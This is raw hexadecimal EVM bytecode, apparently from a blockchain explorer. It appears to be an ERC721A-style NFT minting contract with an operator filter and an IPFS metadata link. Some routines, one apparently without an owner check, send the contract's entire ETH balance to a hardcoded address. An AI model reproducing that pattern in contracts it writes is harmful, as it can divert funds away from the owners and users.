019061109e91906122c9565b6110df57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016110d6919061250f565b60405180910390fd5b5b6110ec85858585611a7f565b5b5050505050565b60606110ff82611af2565b60405160200161110f91906124e2565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461117f57600080fd5b61118982826117fe565b5050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112326113ca565b11158015611241575060005482105b801561127f575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061129182610c83565b90508073ffffffffffffffffffffffffffffffffffffffff166112b2611b4b565b73ffffffffffffffffffffffffffffffffffffffff1614611315576112de816112d9611b4b565b611193565b611314576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113da826118a6565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611441576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061144d84611b53565b91509150611463818761145e611b4b565b611b7a565b6114af5761147886611473611b4b565b611193565b6114ae576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415611516576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115238686866001611bbe565b801561152e57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115fc856115d8888887611bc4565b7c020000000000000000000000000000000000000000000000000000000017611bec565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611684576000600185019050600060046000838152602001908152602001600020541415611682576000548114611681578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116ec8686866001611c17565b505050505050565b60018114801561171d5750611707611c1d565b600d600043815260200190815260200160002054105b80156117695750600b54600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b61177257600080fd5b600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906117c29061290f565b9190505550600d600043815260200190815260200160002060008154809291906117eb9061290f565b91905055506117fb3360016117fe565b50565b611818828260405180602001604052806000815250611c45565b5050565b600047111561188557731c6febe6c71dd76a24a2830370a207ec0aade1ae73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f1935050505015801561187f573d6000803e3d6000fd5b506118a1565b6118a083838360405180602001604052806000815250610f91565b5b505050565b600080829050806118b56113ca565b1161193d5760005481101561193c5760006004600083815260200190815260200160002054905060007c01000000000000000000000000000000000000000000000000000000008216141561193a575b6000811415611930576004600083600190039350838152602001908152602001600020549050611905565b809250505061196f565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611981611b4b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2e611b4b565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a73919061259f565b60405180910390a35050565b611a8a848484610836565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611aec57611ab584848484611ce2565b611aeb576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b3657600184039350600a81066030018453600a8104905080611b3157611b36565b611b0b565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bdb868684611e42565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c2961081f565b600954611c36919061278c565b611c409190612701565b905090565b611c4f8383611e4b565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cdd57600080549050600083820390505b611c8f6000868380600101945086611ce2565b611cc5576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c7c578160005414611cda57600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d08611b4b565b8786866040518563ffffffff1660e01b8152600401611d2a9493929190612553565b602060405180830381600087803b158015611d4457600080fd5b505af1925050508015611d7557506040513d601f19601f82011682018060405250810190611d729190612323565b60015b611def573d8060008114611da5576040519150601f19603f3d011682016040523d82523d6000602084013e611daa565b606091505b50600081511415611de7576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611e8c576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611e996000848385611bbe565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f1083611f016000866000611bc4565b611f0a85612008565b17611bec565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fb157808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f76565b506000821415611fed576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506120036000848385611c17565b505050565b60006001821460e11b9050919050565b600061202b61202684612637565b612612565b90508281526020810184848401111561204757612046612a19565b5b61205284828561286a565b509392505050565b60008135905061206981612ad7565b92915050565b60008135905061207e81612aee565b92915050565b60008151905061209381612aee565b92915050565b6000813590506120a881612b05565b92915050565b6000815190506120bd81612b05565b92915050565b600082601f8301126120d8576120d7612a14565b5b81356120e8848260208601612018565b91505092915050565b60008135905061210081612b1c565b92915050565b60006020828403121561211c5761211b612a23565b5b600061212a8482850161205a565b91505092915050565b6000806040838503121561214a57612149612a23565b5b60006121588582860161205a565b92505060206121698582860161205a565b9150509250929050565b60008060006060848603121561218c5761218b612a23565b5b600061219a8682870161205a565b93505060206121ab8682870161205a565b92505060406121bc868287016120f1565b9150509250925092565b600080600080608085870312156121e0576121df612a23565b5b60006121ee8782880161205a565b94505060206121ff8782880161205a565b9350506040612210878288016120f1565b925050606085013567ffffffffffffffff81111561223157612230612a1e565b5b61223d878288016120c3565b91505092959194509250565b600080604083850312156122605761225f612a23565b5b600061226e8582860161205a565b925050602061227f8582860161206f565b9150509250929050565b600080604083850312156122a05761229f612a23565b5b60006122ae8582860161205a565b92505060206122bf858286016120f1565b9150509250929050565b6000602082840312156122df576122de612a23565b5b60006122ed84828501612084565b91505092915050565b60006020828403121561230c5761230b612a23565b5b600061231a84828501612099565b91505092915050565b60006020828403121561233957612338612a23565b5b6000612347848285016120ae565b91505092915050565b60006020828403121561236657612365612a23565b5b6000612374848285016120f1565b91505092915050565b6000806040838503121561239457612393612a23565b5b60006123a2858286016120f1565b92505060206123b3858286016120f1565b9150509250929050565b6123c6816127c0565b82525050565b6123d5816127d2565b82525050565b60006123e682612668565b6123f0818561267e565b9350612400818560208601612879565b61240981612a28565b840191505092915050565b61241d81612834565b82525050565b600061242e82612673565b612438818561268f565b9350612448818560208601612879565b61245181612a28565b840191505092915050565b600061246782612673565b61247181856126a0565b9350612481818560208601612879565b80840191505092915050565b600061249a6043836126a0565b91506124a582612a39565b604382019050919050565b60006124bd6005836126a0565b91506124c882612aae565b600582019050919050565b6124dc8161282a565b82525050565b60006124ed8261248d565b91506124f9828461245c565b9150612504826124b0565b915081905092915050565b600060208201905061252460008301846123bd565b92915050565b600060408201905061253f60008301856123bd565b61254c60208301846123bd565b9392505050565b600060808201905061256860008301876123bd565b61257560208301866123bd565b61258260408301856124d3565b818103606083015261259481846123db565b905095945050505050565b60006020820190506125b460008301846123cc565b92915050565b60006020820190506125cf6000830184612414565b92915050565b600060208201905081810360008301526125ef8184612423565b905092915050565b600060208201905061260c60008301846124d3565b92915050565b600061261c61262d565b905061262882826128de565b919050565b6000604051905090565b600067ffffffffffffffff821115612652576126516129e5565b5b61265b82612a28565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b60006126b68261282a565b91506126c18361282a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156126f6576126f5612958565b5b828201905092915050565b600061270c8261282a565b91506127178361282a565b92508261272757612726612987565b5b828204905092915050565b600061273d8261282a565b91506127488361282a565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561278157612780612958565b5b828202905092915050565b60006127978261282a565b91506127a28361282a565b9250828210156127b5576127b4612958565b5b828203905092915050565b60006127cb8261280a565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600061283f82612846565b9050919050565b600061285182612858565b9050919050565b60006128638261280a565b9050919050565b82818337600083830152505050565b60005b8381101561289757808201518184015260208101905061287c565b838111156128a6576000848401525b50505050565b600060028204905060018216806128c457607f821691505b602082108114156128d8576128d76129b6565b5b50919050565b6128e782612a28565b810181811067ffffffffffffffff82111715612906576129056129e5565b5b80604052505050565b600061291a8261282a565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561294d5761294c612958565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f697066733a2f2f626166796265696265666b3536787a7775636a61716f34743560008201527f6d6964636f6674737633776c696e32617972673568373469653274746e70663360208201527f63342f0000000000000000000000000000000000000000000000000000000000604082015250565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b612ae0816127c0565b8114612aeb57600080fd5b50565b612af7816127d2565b8114612b0257600080fd5b50565b612b0e816127de565b8114612b1957600080fd5b50565b612b258161282a565b8114612b3057600080fd5b5056fea26469706673582212208995b4ea40b00fab91391836b85be18d0dc69ed589a3ee1f6e32c0440510ccc764736f6c63430008070033

Deployed Bytecode

0x60806040526004361061014b5760003560e01c80636352211e116100b6578063a22cb4651161006f578063a22cb4651461044a578063b88d4fde14610473578063c87b56dd1461048f578063cc47a40b146104cc578063d5abeb01146104f5578063e985e9c5146105205761014b565b80636352211e1461032657806370a082311461036357806377377d75146103a05780638da5cb5b146103cb57806395d89b41146103f65780639c253445146104215761014b565b806323b872dd1161010857806323b872dd146102675780632db11544146102835780633a233f891461029f5780633ccfd60b146102c857806341f43434146102df57806342842e0e1461030a5761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806313faede61461021157806318160ddd1461023c575b600080fd5b34801561015c57600080fd5b50610177600480360381019061017291906122f6565b61055d565b604051610184919061259f565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125d5565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da9190612350565b610681565b6040516101ec919061250f565b60405180910390f35b61020f600480360381019061020a9190612289565b610700565b005b34801561021d57600080fd5b50610226610819565b60405161023391906125f7565b60405180910390f35b34801561024857600080fd5b5061025161081f565b60405161025e91906125f7565b60405180910390f35b610281600480360381019061027c9190612173565b610836565b005b61029d60048036038101906102989190612350565b610996565b005b3480156102ab57600080fd5b506102c660048036038101906102c19190612133565b610a05565b005b3480156102d457600080fd5b506102dd610a6e565b005b3480156102eb57600080fd5b506102f4610b11565b60405161030191906125ba565b60405180910390f35b610324600480360381019061031f9190612173565b610b23565b005b34801561033257600080fd5b5061034d60048036038101906103489190612350565b610c83565b60405161035a919061250f565b60405180910390f35b34801561036f57600080fd5b5061038a60048036038101906103859190612106565b610c95565b60405161039791906125f7565b60405180910390f35b3480156103ac57600080fd5b506103b5610d4e565b6040516103c291906125f7565b60405180910390f35b3480156103d757600080fd5b506103e0610d54565b6040516103ed919061250f565b60405180910390f35b34801561040257600080fd5b5061040b610d7a565b60405161041891906125d5565b60405180910390f35b34801561042d57600080fd5b506104486004803603810190610443919061237d565b610e0c565b005b34801561045657600080fd5b50610471600480360381019061046c9190612249565b610e78565b005b61048d600480360381019061048891906121c6565b610f91565b005b34801561049b57600080fd5b506104b660048036038101906104b19190612350565b6110f4565b6040516104c391906125d5565b60405180910390f35b3480156104d857600080fd5b506104f360048036038101906104ee9190612289565b611125565b005b34801561050157600080fd5b5061050a61118d565b60405161051791906125f7565b60405180910390f35b34801561052c57600080fd5b5061054760048036038101906105429190612133565b611193565b604051610554919061259f565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128ac565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128ac565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611227565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161077892919061252a565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122c9565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061250f565b60405180910390fd5b5b6108148383611286565b505050565b600a5481565b60006108296113ca565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610984573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a9576108a48484846113cf565b610990565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108f292919061252a565b60206040518083038186803b15801561090a57600080fd5b505afa15801561091e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061094291906122c9565b61098357336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161097a919061250f565b60405180910390fd5b5b61098f8484846113cf565b5b50505050565b600954816109a261081f565b6109ac91906126ab565b11156109b757600080fd5b60003414156109ce576109c9816116f4565b610a02565b600e548111156109dd57600080fd5b600a54816109eb9190612732565b3410156109f757600080fd5b610a0133826117fe565b5b50565b6000471115610a6a57731c6febe6c71dd76a24a2830370a207ec0aade1ae73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a68573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ac857600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b0e573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c71573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9657610b9184848461181c565b610c7d565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bdf92919061252a565b60206040518083038186803b158015610bf757600080fd5b505afa158015610c0b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2f91906122c9565b610c7057336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c67919061250f565b60405180910390fd5b5b610c7c84848461181c565b5b50505050565b6000610c8e826118a6565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cfd576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d89906128ac565b80601f0160208091040260200160405190810160405280929190818152602001828054610db5906128ac565b8015610e025780601f10610dd757610100808354040283529160200191610e02565b820191906000526020600020905b815481529060010190602001808311610de557829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e6657600080fd5b81600b81905550806009819055505050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f82576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610ef092919061252a565b60206040518083038186803b158015610f0857600080fd5b505afa158015610f1c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f4091906122c9565b610f8157806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f78919061250f565b60405180910390fd5b5b610f8c8383611974565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110e0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156110055761100085858585611a7f565b6110ed565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161104e92919061252a565b60206040518083038186803b15801561106657600080fd5b505afa15801561107a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061109e91906122c9565b6110df57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016110d6919061250f565b60405180910390fd5b5b6110ec85858585611a7f565b5b5050505050565b60606110ff82611af2565b60405160200161110f91906124e2565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461117f57600080fd5b61118982826117fe565b5050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112326113ca565b11158015611241575060005482105b801561127f575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061129182610c83565b90508073ffffffffffffffffffffffffffffffffffffffff166112b2611b4b565b73ffffffffffffffffffffffffffffffffffffffff1614611315576112de816112d9611b4b565b611193565b611314576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113da826118a6565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611441576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061144d84611b53565b91509150611463818761145e611b4b565b611b7a565b6114af5761147886611473611b4b565b611193565b6114ae576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415611516576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115238686866001611bbe565b801561152e57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115fc856115d8888887611bc4565b7c020000000000000000000000000000000000000000000000000000000017611bec565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611684576000600185019050600060046000838152602001908152602001600020541415611682576000548114611681578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116ec8686866001611c17565b505050505050565b60018114801561171d5750611707611c1d565b600d600043815260200190815260200160002054105b80156117695750600b54600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b61177257600080fd5b600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906117c29061290f565b9190505550600d600043815260200190815260200160002060008154809291906117eb9061290f565b91905055506117fb3360016117fe565b50565b611818828260405180602001604052806000815250611c45565b5050565b600047111561188557731c6febe6c71dd76a24a2830370a207ec0aade1ae73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f1935050505015801561187f573d6000803e3d6000fd5b506118a1565b6118a083838360405180602001604052806000815250610f91565b5b505050565b600080829050806118b56113ca565b1161193d5760005481101561193c5760006004600083815260200190815260200160002054905060007c01000000000000000000000000000000000000000000000000000000008216141561193a575b6000811415611930576004600083600190039350838152602001908152602001600020549050611905565b809250505061196f565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611981611b4b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2e611b4b565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a73919061259f565b60405180910390a35050565b611a8a848484610836565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611aec57611ab584848484611ce2565b611aeb576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b3657600184039350600a81066030018453600a8104905080611b3157611b36565b611b0b565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bdb868684611e42565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c2961081f565b600954611c36919061278c565b611c409190612701565b905090565b611c4f8383611e4b565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cdd57600080549050600083820390505b611c8f6000868380600101945086611ce2565b611cc5576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c7c578160005414611cda57600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d08611b4b565b8786866040518563ffffffff1660e01b8152600401611d2a9493929190612553565b602060405180830381600087803b158015611d4457600080fd5b505af1925050508015611d7557506040513d601f19601f82011682018060405250810190611d729190612323565b60015b611def573d8060008114611da5576040519150601f19603f3d011682016040523d82523d6000602084013e611daa565b606091505b50600081511415611de7576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611e8c576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611e996000848385611bbe565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f1083611f016000866000611bc4565b611f0a85612008565b17611bec565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fb157808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f76565b506000821415611fed576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506120036000848385611c17565b505050565b60006001821460e11b9050919050565b600061202b61202684612637565b612612565b90508281526020810184848401111561204757612046612a19565b5b61205284828561286a565b509392505050565b60008135905061206981612ad7565b92915050565b60008135905061207e81612aee565b92915050565b60008151905061209381612aee565b92915050565b6000813590506120a881612b05565b92915050565b6000815190506120bd81612b05565b92915050565b600082601f8301126120d8576120d7612a14565b5b81356120e8848260208601612018565b91505092915050565b60008135905061210081612b1c565b92915050565b60006020828403121561211c5761211b612a23565b5b600061212a8482850161205a565b91505092915050565b6000806040838503121561214a57612149612a23565b5b60006121588582860161205a565b92505060206121698582860161205a565b9150509250929050565b60008060006060848603121561218c5761218b612a23565b5b600061219a8682870161205a565b93505060206121ab8682870161205a565b92505060406121bc868287016120f1565b9150509250925092565b600080600080608085870312156121e0576121df612a23565b5b60006121ee8782880161205a565b94505060206121ff8782880161205a565b9350506040612210878288016120f1565b925050606085013567ffffffffffffffff81111561223157612230612a1e565b5b61223d878288016120c3565b91505092959194509250565b600080604083850312156122605761225f612a23565b5b600061226e8582860161205a565b925050602061227f8582860161206f565b9150509250929050565b600080604083850312156122a05761229f612a23565b5b60006122ae8582860161205a565b92505060206122bf858286016120f1565b9150509250929050565b6000602082840312156122df576122de612a23565b5b60006122ed84828501612084565b91505092915050565b60006020828403121561230c5761230b612a23565b5b600061231a84828501612099565b91505092915050565b60006020828403121561233957612338612a23565b5b6000612347848285016120ae565b91505092915050565b60006020828403121561236657612365612a23565b5b6000612374848285016120f1565b91505092915050565b6000806040838503121561239457612393612a23565b5b60006123a2858286016120f1565b92505060206123b3858286016120f1565b9150509250929050565b6123c6816127c0565b82525050565b6123d5816127d2565b82525050565b60006123e682612668565b6123f0818561267e565b9350612400818560208601612879565b61240981612a28565b840191505092915050565b61241d81612834565b82525050565b600061242e82612673565b612438818561268f565b9350612448818560208601612879565b61245181612a28565b840191505092915050565b600061246782612673565b61247181856126a0565b9350612481818560208601612879565b80840191505092915050565b600061249a6043836126a0565b91506124a582612a39565b604382019050919050565b60006124bd6005836126a0565b91506124c882612aae565b600582019050919050565b6124dc8161282a565b82525050565b60006124ed8261248d565b91506124f9828461245c565b9150612504826124b0565b915081905092915050565b600060208201905061252460008301846123bd565b92915050565b600060408201905061253f60008301856123bd565b61254c60208301846123bd565b9392505050565b600060808201905061256860008301876123bd565b61257560208301866123bd565b61258260408301856124d3565b818103606083015261259481846123db565b905095945050505050565b60006020820190506125b460008301846123cc565b92915050565b60006020820190506125cf6000830184612414565b92915050565b600060208201905081810360008301526125ef8184612423565b905092915050565b600060208201905061260c60008301846124d3565b92915050565b600061261c61262d565b905061262882826128de565b919050565b6000604051905090565b600067ffffffffffffffff821115612652576126516129e5565b5b61265b82612a28565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b60006126b68261282a565b91506126c18361282a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156126f6576126f5612958565b5b828201905092915050565b600061270c8261282a565b91506127178361282a